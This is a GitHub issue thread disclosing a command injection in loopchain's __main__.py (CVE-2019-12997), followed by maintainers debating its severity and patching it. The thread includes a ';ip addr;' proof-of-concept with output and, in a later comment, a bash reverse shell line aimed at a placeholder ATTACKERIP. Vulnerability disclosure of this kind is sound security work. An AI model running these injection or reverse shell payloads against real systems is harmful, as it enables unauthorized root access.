Skip to content
This repository has been archived by the owner on Dec 15, 2021. It is now read-only.

Command Injection (Privilege Escalation) #231

Closed
ghost opened this issue Jun 20, 2019 · 11 comments
Closed

Command Injection (Privilege Escalation) #231

ghost opened this issue Jun 20, 2019 · 11 comments

Comments

@ghost
Copy link

ghost commented Jun 20, 2019

Description:

Command injection is an attack in which the goal is execution of arbitrary commands on the host operating system via a vulnerable application. Command injection attacks are possible when an application passes unsafe user supplied data (forms, cookies, HTTP headers etc.) to a system shell. In this attack, the attacker-supplied operating system commands are usually executed with the privileges of the vulnerable application. Command injection attacks are possible largely due to insufficient input validation.

Details:

An attacker can manipulate DEFAULT_SCORE_HOST which is trusted user supplied input, this can be used to inject commands and gain arbitrary code execution.

Affected URL:

https://github.com/icon-project/loopchain/blob/2ab4734138d6a2a480a08ee023b2f4d74679ed43/loopchain/__main__.py

Affected Code:

if os.getenv('DEFAULT_SCORE_HOST') is not None: os.system("ssh-keyscan "+os.getenv('DEFAULT_SCORE_HOST')+" >> /root/.ssh/known_hosts")

Reference:

https://www.owasp.org/index.php/Command_Injection

Example/PoC:

import os
os.environ['DEFAULT_SCORE_HOST'] = ';ip addr;'
os.system("ssh-keyscan "+os.getenv('DEFAULT_SCORE_HOST')+" >> ~/.ssh/known_hosts")
usage: ssh-keyscan [-46cHv] [-f file] [-p port] [-T timeout] [-t type]
[host | addrlist namelist] ...
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1000
link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
inet 127.0.0.1/8 scope host lo
valid_lft forever preferred_lft forever
inet6 ::1/128 scope host 
valid_lft forever preferred_lft forever
2: ens33: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc fq_codel state UP group default qlen 1000
link/ether 00:0c:29:8c:ab:b0 brd ff:ff:ff:ff:ff:ff
inet 172.16.12.139/24 brd 172.16.12.255 scope global dynamic noprefixroute ens33
valid_lft 1156sec preferred_lft 1156sec
inet6 fe80::f8e1:1ae5:174a:ea03/64 scope link noprefixroute 
valid_lft forever preferred_lft forever
0
@Spl3en
Copy link
Contributor

Spl3en commented Jun 20, 2019

You mean an attacker having access to environment variables is also able to inject commands in its own loopchain node ?
Is it really critical ? As you need first to be able to overwrite environment variables remotely, in the remote loopchain user, then you need to be able to remotely reboot the loopchain node.
I'd agree the whole os.system code is bad and should be fixed, but "user input" can be misleading if the only user input you can inject is the one from the loopchain administrator.

@ghost
Copy link
Author

ghost commented Jun 20, 2019

Hi thanks for your reply. I totally agree with you, but I did not mean remotely. What I meant was an attacker can escalate privileges from a low privilege shell by changing the environment (Injection in environment variable) .

yakkle added a commit that referenced this issue Jun 21, 2019
 - remove legacy score configurations, useless code
 - fix command injection issue (#231)
@yakkle
Copy link
Member

yakkle commented Jun 21, 2019

I created PR that would be fixed this issue.
thank you.

@ghost
Copy link
Author

ghost commented Jun 21, 2019

Thank you. Am I still eligible for a bounty please?

@Spl3en
Copy link
Contributor

Spl3en commented Jun 21, 2019

You may need to apply in the ICONLOOP Bug Bounty program if you want to raise awareness about the vulnerability you found, and let the people responsible of the bug bounty program to evaluate the vulnerability reward : https://hackerone.com/iconloop_inc

@sink772
Copy link
Member

sink772 commented Jun 21, 2019

I don't think this is critical, because the attacker first needs to gain access to the host where the loopchain is running. Furthermore, loopchain itself doesn't need any special privileges to run, so there is nothing the attacker could get from the such attack.

@ghost
Copy link
Author

ghost commented Jun 27, 2019

A hacker can escalate their privileges to root after gaining a low privilege shell. So it is a privilege escalation vulnerability, thanks anyways for listening.

@ghost ghost closed this as completed Jun 27, 2019
yakkle added a commit that referenced this issue Jun 27, 2019
 - remove legacy score configurations, useless code
 - fix command injection issue (#231)
yakkle added a commit that referenced this issue Jun 27, 2019
 - remove legacy score configurations, useless code
 - fix command injection issue (#231)
yakkle added a commit that referenced this issue Jun 28, 2019
 - remove legacy score configurations, useless code
 - fix command injection issue (#231)
@ghost
Copy link
Author

ghost commented Jun 28, 2019

A CVE was assigned but unfortunately hackerone/your company refuses to pay the bounty. However my objective as a Security Researcher as been fulfilled, thank you for patching this vulnerability.

https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-12997
https://nvd.nist.gov/vuln/detail/CVE-2019-12997

@ghost ghost changed the title Command Injection Command Injection (Privilege Escalation) Jun 28, 2019
@Spl3en
Copy link
Contributor

Spl3en commented Jun 28, 2019

@memN0ps

A hacker can escalate their privileges to root after gaining a low privilege shell

Could you provide us detailed steps to reproduce such exploit in a loopchain environment to acquire a root shell from your exploit please ?

As sink772 mentionned, the loopchain engine doesn't require to run with any special privileges. So classifying this vulnerability as a privesc to root doesn't sound correct with the current vulnerability you've pointed out.

Thanks for the vulnerability report and for the fix, let's classify it correctly and remain factual.

@ghost
Copy link
Author

ghost commented Jun 30, 2019

So if you look at this line of code:

os.system("ssh-keyscan "+os.getenv('DEFAULT_SCORE_HOST')+" >> /root/.ssh/known_hosts")

This command will need root privileges to run as its trying to append/write something to /root/.ssh/known_hosts. (Anything that writes to root directory needs root privilege)

Lets say an attacker gets a low privilege shell where Loopchain is installed. The attacker now wants to escalate privileges root so he/she will injected a bash reverse shell inside of DEFAULT_SCORE_HOST environment variable, then whenever that line of code runs, it will send a reverse shell with root privileges to the attacker.

Simple but effective.

The line of code would then look like this:

os.system("ssh-keyscan "+ ;bash -i >& /dev/tcp/ATTACKERIP/PORT 0>&1;+" >> /root/.ssh/known_hosts")

As you can see the semi-colons terminated the irrelevant queries so only the attackers code gets executed in bash. Now this command will have to be run as root as its writing to /root/ directory. Try and understand the concept please.

@Spl3en
Copy link
Contributor

Spl3en commented Jun 30, 2019

I'm having no issue understanding the concept, but thanks for the explanation :)

then whenever that line of code runs, it will send a reverse shell with root privileges to the attacker.

No, that's not what happens in a normal scenario.
I'm actually trying to tell you that this line of code do nothing at all because the loopchain engine doesn't run anymore with root privileges. Look at the patch : the vulnerable lines of code have been removed.
You actually need to force root to start a loopchain instance if you want to escalate anything. Basically, you need a privesc in order to trigger your privesc.

Anyway, this is indeed a command injection from legacy code, and it deserved to be reported, so thanks for that.

This issue was closed.
Sign up for free to subscribe to this conversation on GitHub. Already have an account? Sign in.
Labels
None yet
Projects
None yet
Development

No branches or pull requests

3 participants